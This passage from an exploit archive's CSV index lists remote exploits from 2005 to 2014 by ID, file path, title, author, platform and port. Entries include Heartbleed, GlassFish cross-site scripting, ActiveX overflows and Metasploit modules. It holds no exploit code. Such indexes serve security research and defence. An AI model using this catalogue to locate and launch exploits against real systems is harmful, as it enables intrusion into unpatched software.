URI Cross-Site Scripting",2008-05-29,Doz,hardware,remote, -31864,exploits/hardware/remote/31864.txt,"Xerox DocuShare 6 - docushare/dsweb/ServicesLib/Group URI Cross-Site Scripting",2008-05-29,Doz,hardware,remote, -31873,exploits/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow",2008-06-03,"Dennis Rand",windows,remote, -31875,exploits/linux/remote/31875.py,"Python - 'socket.recvfrom_into()' Remote Buffer Overflow",2014-02-24,Sha0,linux,remote, -31885,exploits/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php?css_exceptions' Cross-Site Scripting",2008-06-05,nnposter,hardware,remote, -31886,exploits/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php?sql_matchscope' Cross-Site Scripting",2008-06-05,nnposter,hardware,remote, -31887,exploits/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Directory Traversal",2008-06-06,"Tan Chew Keong",linux,remote, -31890,exploits/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",multiple,remote, -31901,exploits/multiple/remote/31901.txt,"Sun GlassFish 2.1 - 'name' Cross-Site Scripting",2008-06-10,"Eduardo Neves",multiple,remote, -31903,exploits/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",linux,remote, -31909,exploits/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution",2008-06-13,securfrog,windows,remote, -31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",multiple,remote, -31918,exploits/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote, -31920,exploits/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote, -31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote, -31922,exploits/multiple/remote/31922.txt,"GlassFish Application Server - '/resourceNode/customResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote, -31923,exploits/multiple/remote/31923.txt,"GlassFish Application Server - '/resourceNode/externalResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote, -31924,exploits/multiple/remote/31924.txt,"GlassFish Application Server - '/resourceNode/jmsDestinationNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote, -31925,exploits/multiple/remote/31925.txt,"GlassFish Application Server - '/resourceNode/jmsConnectionNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote, -31926,exploits/multiple/remote/31926.txt,"GlassFish Application Server - '/resourceNode/jdbcResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote, -31927,exploits/multiple/remote/31927.txt,"GlassFish Application Server - '/Applications/lifecycleModulesNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote, -31928,exploits/multiple/remote/31928.txt,"GlassFish Application Server - '/resourceNode/jdbcConnectionPoolNew1.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote, -31936,exploits/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Directory Traversal",2008-06-17,"Tan Chew Keong",multiple,remote, -31941,exploits/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote, -31942,exploits/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote, -32048,exploits/osx/remote/32048.html,"Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote, -32133,exploits/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption functions Buffer Overflow",2008-07-31,"Chris Evans",linux,remote, -31980,exploits/windows/remote/31980.html,"UUSee 2008 - UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download",2008-06-26,Symantec,windows,remote, -31987,exploits/windows/remote/31987.rb,"GE Proficy CIMPLICITY - 'gefebt.exe' Remote Code Execution (Metasploit)",2014-02-28,Metasploit,windows,remote,80 -31996,exploits/windows/remote/31996.txt,"Microsoft Internet Explorer 7/8 Beta 1 - Frame Location Cross Domain Security Bypass",2008-06-27,"Eduardo Vela",windows,remote, -31997,exploits/windows/remote/31997.txt,"AceFTP 3.80.3 - 'LIST' Directory Traversal",2008-06-27,"Tan Chew Keong",windows,remote, -32012,exploits/linux/remote/32012.txt,"Netrw 125 Vim Script - Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote, -32132,exploits/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote, -32049,exploits/windows/remote/32049.txt,"Microsoft Internet Explorer 6 - New ActiveX Object String Concatenation Memory Corruption",2008-07-14,0x000000,windows,remote, -32052,exploits/windows/remote/32052.html,"Sina DLoader Class - ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download",2008-07-14,Symantec,windows,remote, -32084,exploits/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module - Remote Command Execution",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote, -32110,exploits/multiple/remote/32110.txt,"Outpost Security Suite Pro 2009 - Filename Parsing Security Bypass",2008-07-22,"Juan Pablo Lopez Yacubian",multiple,remote, -32124,exploits/windows/remote/32124.txt,"Eyeball MessengerSDK 'CoVideoWindow.ocx' 5.0.907 - ActiveX Control Remote Buffer Overflow",2008-07-29,"Edi Strosar",windows,remote, -32129,exploits/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 - '.PLF' File Stack Buffer Overflow",2008-07-30,"fl0 fl0w",windows,remote, -32137,exploits/multiple/remote/32137.txt,"Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure",2008-08-01,"Stefano Di Paola",multiple,remote, -32138,exploits/multiple/remote/32138.txt,"Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",multiple,remote, -32163,exploits/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 - 'pdmwService.exe' Arbitrary File Write (Metasploit)",2014-03-10,Metasploit,windows,remote,30000 -32164,exploits/windows/remote/32164.rb,"HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)",2014-03-10,Metasploit,windows,remote,5555 -32165,exploits/linux/remote/32165.txt,"XAMPP Linux 1.6 - 'ming.php?text' Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote, -32166,exploits/linux/remote/32166.txt,"XAMPP Linux 1.6 - 'iart.php?text' Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote, -32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,multiple,remote, -32189,exploits/multiple/remote/32189.py,"DD-WRT - Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote, -32197,exploits/windows/remote/32197.pl,"Maxthon Browser 1.x - Content-Type Buffer Overflow",2008-08-09,DATA_SNIPER,windows,remote, -32209,exploits/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20171 -32210,exploits/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20111 -32223,exploits/multiple/remote/32223.rb,"Ruby 1.9 dl - Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote, -32224,exploits/multiple/remote/32224.rb,"Ruby 1.9 - Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote, -32225,exploits/linux/remote/32225.txt,"Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",linux,remote, -32228,exploits/linux/remote/32228.xml,"Bugzilla 3.1.4 - '--attach_path' Directory Traversal",2008-08-12,"ilja van sprundel",linux,remote, -32286,exploits/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal",2008-08-21,"Deniz Cevik",linux,remote, -32289,exploits/linux/remote/32289.txt,"Vim 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote, -32301,exploits/windows/remote/32301.py,"Kyocera Mita Scanner File Utility 3.3.0.1 - File Transfer Directory Traversal",2008-08-26,"Seth Fogie",windows,remote, -32303,exploits/linux/remote/32303.txt,"Mono 2.0 - 'System.Web' HTTP Header Injection",2008-08-20,"Juraj Skripsky",linux,remote, -32336,exploits/hardware/remote/32336.txt,"D-Link DIR-100 1.12 - Security Bypass",2008-09-08,"Marc Ruef",hardware,remote, -32339,exploits/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution",2008-09-08,"Ivan Sanchez",windows,remote, -32344,exploits/windows/remote/32344.txt,"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (1)",2008-09-08,Ciph3r,windows,remote, -32345,exploits/windows/remote/32345.cpp,"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)",2008-09-08,Ciph3r,windows,remote, -32367,exploits/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command (Metasploit)",2014-03-19,Metasploit,unix,remote,22 -32359,exploits/php/remote/32359.txt,"SePortal 2.5 - SQL Injection (2)",2014-03-19,jsass,php,remote, -32363,exploits/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote, -32371,exploits/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote, -32372,exploits/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,unix,remote,22 -32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",multiple,remote, -32426,exploits/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 - Remote Stack Buffer Overflow",2008-09-26,"Ruben Santamarta",windows,remote, -32429,exploits/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 - ActiveX Control 'CanUninstall()' Remote Buffer Overflow",2008-09-27,Satan_HackerS,windows,remote, -32438,exploits/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) (Metasploit)",2014-03-22,Metasploit,windows,remote, -32439,exploits/php/remote/32439.rb,"Horde Framework - Unserialize PHP Code Execution (Metasploit)",2014-03-22,Metasploit,php,remote,80 -32440,exploits/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,hardware,remote,22 -32442,exploits/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote, -32445,exploits/linux/remote/32445.txt,"MySQL 5 - Command Line Client HTML Special Characters HTML Injection",2008-09-30,"Thomas Henlich",linux,remote, -32456,exploits/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Directory Traversal",2008-10-03,dmnt,windows,remote, -32457,exploits/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 - 'cds.php' SQL Injection",2008-10-03,"Jaykishan Nirmal",windows,remote, -32458,exploits/multiple/remote/32458.txt,"OpenNMS 1.5.x - HTTP Response Splitting",2008-10-05,"BugSec LTD",multiple,remote, -32460,exploits/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 - 'Phonebook.php' SQL Injection",2008-10-06,"Jaykishan Nirmal",windows,remote, -32465,exploits/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,windows,remote, -32466,exploits/multiple/remote/32466.html,"Mozilla Firefox 3.0.3 - Internet Shortcut Same Origin Policy Violation",2008-10-07,"Liu Die Yu",multiple,remote, -32469,exploits/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",hardware,remote, -32470,exploits/linux/remote/32470.rb,"CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,linux,remote, -32475,exploits/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY Directory' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote, -32564,exploits/multiple/remote/32564.txt,"XWork < 2.0.11.2 - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",multiple,remote, -32489,exploits/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection",2008-10-15,"Martin Suess",windows,remote, -32491,exploits/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Remote Buffer Overflow",2008-10-16,"Thomas Pollet",windows,remote, -32493,exploits/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote, -32515,exploits/linux/remote/32515.rb,"Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,linux,remote,443 -32517,exploits/windows/remote/32517.html,"Mozilla Firefox 3 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",windows,remote, -32518,exploits/windows/remote/32518.html,"Google Chrome 0.2.149 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",windows,remote, -32529,exploits/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",multiple,remote, -32530,exploits/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap'/'.mime.type' Local Code Execution",2008-11-03,"Piotr Engelking",linux,remote, -32548,exploits/linux/remote/32548.html,"Opera Web Browser 9.x - History Search and Links Panel Cross-Site Scripting",2008-10-30,"Stefano Di Paola",linux,remote, -32552,exploits/hardware/remote/32552.txt,"SonicWALL - Content Filtering Blocked Site Error Page Cross-Site Scripting",2008-10-30,pagvac,hardware,remote, -32555,exploits/windows/remote/32555.html,"Opera Web Browser 9.62 - History Search Input Validation",2008-10-31,NeoCoderz,windows,remote, -32565,exploits/multiple/remote/32565.txt,"Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote, -32568,exploits/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution (Metasploit)",2014-03-28,"SecPod Research",windows,remote,80 -32578,exploits/windows/remote/32578.py,"Yosemite Backup 8.70 - 'DtbClsLogin()' Remote Buffer Overflow",2008-11-11,"Abdul-Aziz Hariri",windows,remote, -32582,exploits/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass",2008-11-12,"Craig Heffner",hardware,remote, -32586,exploits/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - 'Username' Enumeration",2008-11-14,"Bernardo Damele",windows,remote, -32621,exploits/php/remote/32621.rb,"SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit)",2014-03-31,Metasploit,php,remote,80 -32591,exploits/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote, -32599,exploits/hardware/remote/32599.txt,"Linksys WRT160N - 'apply.cgi' Cross-Site Scripting",2008-11-27,"David Gil",hardware,remote, -32618,exploits/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,php,remote, -32643,exploits/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060 -32654,exploits/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass",2008-12-11,"Rafel Ivgi",windows,remote, -32673,exploits/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote, -32674,exploits/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote, -32681,exploits/hardware/remote/32681.txt,"COMTREND CT-536 / HG-536 Routers - Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote, -32684,exploits/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 - '.WAV' File Parsing Code Execution",2008-12-29,anonymous,windows,remote, -32686,exploits/multiple/remote/32686.xml,"MagpieRSS 0.72 - CDATA HTML Injection",2008-12-29,system_meltdown,multiple,remote, -32690,exploits/linux/remote/32690.txt,"xterm - DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",linux,remote, -32691,exploits/linux/remote/32691.txt,"Audio File Library 0.2.6 - libaudiofile 'msadpcm.c .WAV' File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote, -32699,exploits/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote, -32711,exploits/windows/remote/32711.txt,"Multiple CA Service Management Products - Remote Command Execution",2009-01-07,"Michel Arboi",windows,remote, -32723,exploits/hardware/remote/32723.txt,"Cisco IOS 12.x - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote, -32725,exploits/windows/remote/32725.rb,"JIRA Issues Collector - Directory Traversal (Metasploit)",2014-04-07,Metasploit,windows,remote,8080 -32738,exploits/ios/remote/32738.txt,"Bluetooth Text Chat 1.0 iOS - Code Execution",2014-04-08,Vulnerability-Lab,ios,remote, -32743,exploits/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Vulnerabilities",2014-04-08,"Juan Manuel Garcia",hardware,remote, -32745,exploits/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - ''Heartbleed' Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443 -32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Unauthenticated Command Injection (Metasploit)",2014-04-08,Metasploit,hardware,remote, -32762,exploits/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - 'Username' Enumeration",2009-01-27,"Marco Mella",multiple,remote, -32764,exploits/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 -32776,exploits/hardware/remote/32776.txt,"Cisco IOS 12.4(23) - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote, -32780,exploits/linux/remote/32780.py,"PyCrypto ARC2 Module - Remote Buffer Overflow",2009-02-07,"Mike Wiacek",linux,remote, -32781,exploits/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",multiple,remote, -32789,exploits/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - Authenticated Arbitrary Command Execution (Metasploit)",2014-04-10,Metasploit,unix,remote,443 -32791,exploits/multiple/remote/32791.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1)",2014-04-10,prdelka,multiple,remote,443 -32794,exploits/php/remote/32794.rb,"Vtiger - 'Install' Unauthenticated Remote Command Execution (Metasploit)",2014-04-10,Metasploit,php,remote,80 -32795,exploits/novell/remote/32795.txt,"Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote, -32796,exploits/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",linux,remote, -32798,exploits/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,multiple,remote, -32799,exploits/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote, -32801,exploits/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote, -32811,exploits/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",unix,remote, -32904,exploits/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)",2014-04-16,Metasploit,windows,remote, -32825,exploits/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote, -32826,exploits/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote, -32832,exploits/windows/remote/32832.py,"NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow",2009-03-02,"AbdulAziz Hariri",windows,remote, -32834,exploits/linux/remote/32834.txt,"cURL/libcURL 7.19.3 - HTTP 'Location:' Redirect Security Bypass",2009-03-03,"David Kierznowski",linux,remote, -32837,exploits/linux/remote/32837.py,"Wesnoth 1.x - PythonAI Remote Code Execution",2009-02-25,Wesnoth,linux,remote, -32839,exploits/multiple/remote/32839.txt,"IBM Websphere Application Server 6.1/7.0 - Administrative Console Cross-Site Scripting",2009-02-26,IBM,multiple,remote, -32851,exploits/windows/remote/32851.html,"Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote, -32876,exploits/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote, -32877,exploits/multiple/remote/32877.txt,"Xlight FTP Server 3.2 - 'user' SQL Injection",2009-03-19,fla,multiple,remote, -32878,exploits/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN - Cross-Site Scripting",2009-03-31,"Bugs NotHugs",hardware,remote, -32879,exploits/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote, -32885,exploits/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root Remote Code Execution (Metasploit)",2014-04-15,"Brandon Perry",unix,remote,443 -32998,exploits/multiple/remote/32998.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)",2014-04-24,"Ayman Sagy",multiple,remote, -32997,exploits/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote, -32919,exploits/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote, -32920,exploits/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,DSecRG,multiple,remote, -32921,exploits/multiple/remote/32921.txt,"Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting",2009-04-16,DSecRG,multiple,remote, -32922,exploits/multiple/remote/32922.html,"Apache Geronimo 2.1.x - Cross-Site Request Forgery (Multiple Admin Function)",2009-04-16,DSecRG,multiple,remote, -32923,exploits/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow",2009-04-16,e.wiZz!,windows,remote, -32925,exploits/multiple/remote/32925.txt,"NRPE 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote, -32929,exploits/linux/remote/32929.txt,"RedHat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",linux,remote, -32931,exploits/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 Firmware - 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",hardware,remote, -32938,exploits/hardware/remote/32938.c,"Sercomm TCP/32674 - Backdoor Reactivation",2014-04-18,Synacktiv,hardware,remote,32674 -32942,exploits/linux/remote/32942.txt,"Mozilla (Multiple Products) - Server Refresh Header Cross-Site Scripting",2009-04-22,"Olli Pettay",linux,remote, -32944,exploits/multiple/remote/32944.txt,"SAP cFolders - Cross-Site Scripting / HTML Injection",2009-04-21,"Digital Security Research Group",multiple,remote, -32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote, -32954,exploits/hardware/remote/32954.txt,"Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - 'adm/file.cgi' Multiple Directory Traversal Vulnerabilities",2009-04-23,pagvac,hardware,remote, -32955,exploits/hardware/remote/32955.js,"Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Multiple Cross-Site Scripting Vulnerabilities",2009-04-25,pagvac,hardware,remote, -32957,exploits/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote, -32959,exploits/windows/remote/32959.rb,"Adobe Flash Player - Regular Expression Heap Overflow (Metasploit)",2014-04-21,Metasploit,windows,remote, -32962,exploits/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 - Security Bypass",2009-04-29,J.Greil,cgi,remote, -32965,exploits/linux/remote/32965.c,"GnuTLS 2.6.x - libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing",2009-04-30,"Miroslav Kratochvil",linux,remote, -32967,exploits/multiple/remote/32967.txt,"Openfire 3.x - jabber:iq:auth 'passwd_change' Remote Password Change",2009-05-04,"Daryl Herzmann",multiple,remote, -32971,exploits/multiple/remote/32971.txt,"GlassFish Enterprise Server 2.1 - Admin Console /applications/applications.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -33577,exploits/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote, -33352,exploits/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Remote Stack Buffer Overflow",2014-05-14,superkojiman,windows,remote,80 -32978,exploits/multiple/remote/32978.txt,"GlassFish Enterprise Server 2.1 - Admin Console /sysnet/registration.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -32974,exploits/multiple/remote/32974.txt,"GlassFish Enterprise Server 2.1 - Admin Console /configuration/configuration.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -32975,exploits/multiple/remote/32975.txt,"GlassFish Enterprise Server 2.1 - Admin Console /customMBeans/customMBeans.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -32977,exploits/multiple/remote/32977.txt,"GlassFish Enterprise Server 2.1 - Admin Console /resourceNode/resources.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -32979,exploits/multiple/remote/32979.txt,"GlassFish Enterprise Server 2.1 - Admin Console /webService/webServicesGeneral.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -32980,exploits/multiple/remote/32980.txt,"GlassFish Enterprise Server 2.1 - Admin Console '/configuration/auditModuleEdit.jsf?name' Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -32981,exploits/multiple/remote/32981.txt,"GlassFish Enterprise Server 2.1 - Admin Console '/resourceNode/jdbcResourceEdit.jsf?name' Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -32987,exploits/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote, -32994,exploits/multiple/remote/32994.xml,"Apple Safari 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote, -32996,exploits/multiple/remote/32996.txt,"Nortel Contact Center Manager - Administration Password Disclosure",2009-05-14,"Bernhard Muller",multiple,remote, -33007,exploits/multiple/remote/33007.txt,"Novell Groupwise 8.0 Webaccess - Multiple Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote, -33010,exploits/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 - Log File Remote Format String",2009-05-26,lofi42,hardware,remote, -33016,exploits/hardware/remote/33016.txt,"SonicWALL SSL-VPN - 'cgi-bin/welcome/VirtualOffice' Remote Format String",2009-05-29,"Patrick Webster",hardware,remote, -33023,exploits/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' 